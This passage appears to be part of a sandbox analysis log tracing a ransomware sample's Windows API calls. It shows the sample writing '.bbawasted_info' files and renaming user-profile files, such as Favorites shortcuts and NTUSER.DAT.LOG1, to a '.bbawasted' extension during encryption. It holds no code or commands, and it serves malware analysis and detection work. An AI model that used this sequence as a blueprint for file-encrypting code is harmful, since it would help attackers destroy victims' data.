(hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.514] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.514] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.514] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.527] SetEndOfFile (hFile=0x120) returned 1 [0077.529] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.529] CloseHandle (hObject=0x120) returned 1 [0077.530] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0077.530] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.531] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.531] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.531] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0077.531] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5d2990 [0077.531] lstrcpyW (in: lpString1=0x5d2a12, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.531] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.531] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.532] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.532] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.533] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.534] SetEndOfFile (hFile=0x120) returned 1 [0077.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.534] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.534] lstrcpyW (in: lpString1=0x5d2a12, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.bbawasted")) returned 1 [0077.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.582] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.583] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.584] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d2c70 | out: pbBuffer=0x5d2c70) returned 1 [0077.584] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.584] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.584] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.585] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.593] SetEndOfFile (hFile=0x120) returned 1 [0077.595] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.595] CloseHandle (hObject=0x120) returned 1 [0077.596] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0077.597] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.609] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.609] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.609] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0077.609] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5d0700 [0077.609] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.609] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.609] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.610] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.610] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.610] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.611] SetEndOfFile (hFile=0x120) returned 1 [0077.611] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.612] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.612] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.bbawasted")) returned 1 [0077.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.613] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.623] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0077.624] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf0b8 | out: pbBuffer=0x5bf0b8) returned 1 [0077.624] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.624] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0077.625] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.625] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.634] SetEndOfFile (hFile=0x120) returned 1 [0077.636] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.636] CloseHandle (hObject=0x120) returned 1 [0077.640] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.640] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.641] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.641] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0077.641] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5bf070 [0077.641] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.641] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.641] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.642] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.642] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.643] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.645] SetEndOfFile (hFile=0x120) returned 1 [0077.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.645] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.645] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.bbawasted")) returned 1 [0077.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.647] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.647] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.648] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.648] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.648] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.649] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.649] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.658] SetEndOfFile (hFile=0x120) returned 1 [0077.692] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.692] CloseHandle (hObject=0x120) returned 1 [0077.694] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.694] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.695] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.695] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.695] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0077.695] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5d2c30 [0077.695] lstrcpyW (in: lpString1=0x5d2cb2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.695] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.695] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.696] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.696] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.696] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.697] SetEndOfFile (hFile=0x120) returned 1 [0077.707] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.707] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.707] lstrcpyW (in: lpString1=0x5d2cb2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.bbawasted")) returned 1 [0077.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.708] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.708] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.709] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.709] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.709] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.710] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.710] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.718] SetEndOfFile (hFile=0x120) returned 1 [0077.720] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.720] CloseHandle (hObject=0x120) returned 1 [0077.722] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c30 | out: hHeap=0x580000) returned 1 [0077.722] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.722] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.722] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.722] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0077.722] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5d2c30 [0077.723] lstrcpyW (in: lpString1=0x5d2cb6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.723] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.723] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.723] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.723] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.724] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.725] SetEndOfFile (hFile=0x120) returned 1 [0077.725] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.725] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.725] lstrcpyW (in: lpString1=0x5d2cb6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.bbawasted")) returned 1 [0077.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.726] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.726] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.727] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.727] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.727] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.728] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.728] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.736] SetEndOfFile (hFile=0x120) returned 1 [0077.753] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.753] CloseHandle (hObject=0x120) returned 1 [0077.758] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c30 | out: hHeap=0x580000) returned 1 [0077.758] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.759] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0077.759] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.759] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0077.759] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x252) returned 0x5bf070 [0077.759] lstrcpyW (in: lpString1=0x5bf0b8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.759] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.759] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0077.760] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.760] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.760] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0077.761] SetEndOfFile (hFile=0x120) returned 1 [0077.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.761] lstrcpyW (in: lpString1=0x5bf0b8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted")) returned 1 [0077.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.763] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.817] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0077.818] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.818] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.818] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0077.818] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0077.818] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.827] SetEndOfFile (hFile=0x120) returned 1 [0077.829] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.829] CloseHandle (hObject=0x120) returned 1 [0077.832] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.832] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0077.833] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: 